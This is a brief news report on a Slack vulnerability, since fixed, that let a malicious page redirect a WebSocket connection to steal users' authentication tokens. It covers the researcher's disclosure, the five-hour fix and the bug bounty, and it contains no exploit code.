Slack has fixed a security flaw that let hackers steal user authentication tokens used to gain full and complete access to accounts and messages.
Frans Rosén created a proof-of-concept exploit that allowed his own malicious page to reconnect a Slack connection to his own server, allowing him to steal a user’s private Slack token used to log in the user to the collaborative messaging service.
That would’ve given him full access to that user’s account, he said in a write-up.
He initially found the bug after realizing he could manipulate certain Slack code functions, such as controlling browser notifications and switching to other chats. Rosén also found a number of smaller flaws in Slack’s calling functionality, allowing him to drop calls and intercept messages.
He said that “none of the events was punchy enough.”
The researcher was able to build an exploit that allowed him to steal tokens. When the victim clicks on the malicious page, the page starts a Slack call, which then begins a new WebSocket connection, which he deliberately interrupts and points to his malicious server.
Slack fixed the bug in five hours, said Rosén, and earned him $3,000 from the company’s bug bounty.
The collaborative messaging company confirmed that the bug had “never been exploited.”
Source: SANS ISC SecNewsFeed @ March 2, 2017 at 08:00AM